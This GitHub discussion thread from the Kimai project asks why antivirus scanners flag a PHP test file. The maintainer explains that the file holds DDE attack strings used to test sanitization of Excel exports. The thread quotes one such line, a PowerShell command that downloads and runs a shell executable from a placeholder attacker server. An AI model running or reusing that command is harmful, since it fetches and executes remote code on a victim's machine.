### DISCUSSION TITLE
virustotal / main/tests/Utils/StringHelperTest.php

### DISCUSSION THREAD

**Discussion by ra10ra** [kimai/kimai#4253] [Questions & Answers] [answered]
Hello,

the file "main/tests/Utils/StringHelperTest.php " is detected as a virus by 9 scanners.
I looked in the file an e.g "powershell IEX(wget attacker_server/shell.exe)'" seams a
little strange to me. But: i can not program php!

So I would like to ask for Your comments.

Thanks

https://www.virustotal.com/gui/file/3dae51749733ee0fd9c6e71003319cfdb71be1c55bf54a6e41f69ff052868229

**Comment by kevinpapst** [comment, marked as answer]
Likely because these tests (which are only run during build time here at Github contain well DDE attack strings:
https://github.com/kimai/kimai/blob/main/tests/Utils/StringHelperTest.php#L32

The tests verify that those are sanitized, if a string (e.g. a timesheet description) contains them.
That is important for Windows user that use the Excel export.

This is a false positive warning 🤷

Solution: ignore the warning. You can also delete the entire tests/ directory if you are afraid. It is not needed during runtime.
